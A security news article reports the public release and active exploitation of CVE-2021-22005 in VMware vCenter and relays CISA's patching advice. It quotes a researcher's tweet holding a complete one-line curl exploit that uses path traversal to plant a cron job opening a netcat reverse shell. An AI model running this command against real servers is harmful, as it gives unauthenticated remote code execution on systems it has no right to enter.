A Working Exploit for the CVE-2021-22005 Flaw in VMware vCenter Was Publicly Released
Cybercriminals Are Already Taking Advantage of It.
A working exploit for the Remote Code Execution (RCE) vulnerability in VMware vCenter tracked as CVE-2021-22005 has been publicly released. According to security experts, the bug is already exploited by hackers.
A Different Exploit
The exploit, released this week by a security expert at Rapid7, differs from the PoC exploit that began to circulate last week. This version can be used to open a reverse shell on an exposed server, enabling a threat actor to perform arbitrary code.
According to experts, the RCE flaw enables an unauthenticated, remote attacker to upload files to the vCenter Server analytics service.
Complete Exploit in Reserve
The Rapid7 expert said in a tweet that the PoC exploit for CVE-2021-22005 works against endpoints in servers that have the Customer Experience Improvement Program (CEIP) component enabled.
CVE-2021-22005: Exploitation in the wild confirmed. Unredacted RCE PoC against CEIP below.
curl -kv “https://172.16.57.2/analytics/telemetry/ph/api/hyper/send?_c=&_i=/../../../../../../etc/cron.d/$RANDOM” -H Content-Type: -d “* * * * * root nc -e /bin/sh 172.16.57.1 4444” https://t.co/wi08brjl3r pic.twitter.com/bwjMA21ifA
— wvu (@wvuuuuuuuuuuuuu) September 27, 2021
This vulnerability can be used by anyone who can reach vCenter Server over the network to gain access, regardless of the configuration settings of vCenter Server.
As mentioned by BleepingComputer, the researcher explained in a technical analysis that the PoC starts with a request to generate a directory for path traversal and schedules the spawn of a reverse shell.
CVE-2021-22005 could be exploited by anyone who can reach vCenter Server over the network, results from search engines indexing machines exposed on the public internet showed thousands of VMware vCenter hosts accessible over the web.
The American cloud computing and virtualization technology company announced CVE-2021-22005 on September 21 received a CVSS 3.1 severity rating of 9.8/10 with experts urging companies everywhere to think about “an emergency change” under ITIL best practices of managing IT services, and patch immediately.
Last week, CISA also published a press release advising organizations with affected vCenter Server versions to:
- Upgrade to a fixed variant as rapidly as possible. See VMware Security Advisory VMSA-2021-0020 for patching-related details
- Apply the temporary workaround provided by VMware, if unable to upgrade to a fixed version immediately.
Following the code examination, CERT/CC vulnerability analyst Will Dormann said:
– CVE-2021-22005 is TWO different vulnerabilities. 😕
– The missing part from this PoC will indeed keep away script kiddies, but not any determined actor.
– I haven’t seen a complete exploit published yet, but surely it’ll only a BRIEF amount of time before that happens. https://t.co/KgHWwtkUU1 pic.twitter.com/DxhxoKaDUO
— Will Dormann (@wdormann) September 27, 2021
In a previous article, we saw that malicious actors started going after the CVE-2021-22005 vulnerability. The threat intelligence firm Bad Packets has detected active scanning activity, with some of its VMware honeypots documenting attackers looking for the serious issue mere hours after VMware was published.
Now, with a complete exploit ready to be used, the specialists expect an increase in cybersecurity incidents because more and more threat actors show interest in such malicious activities.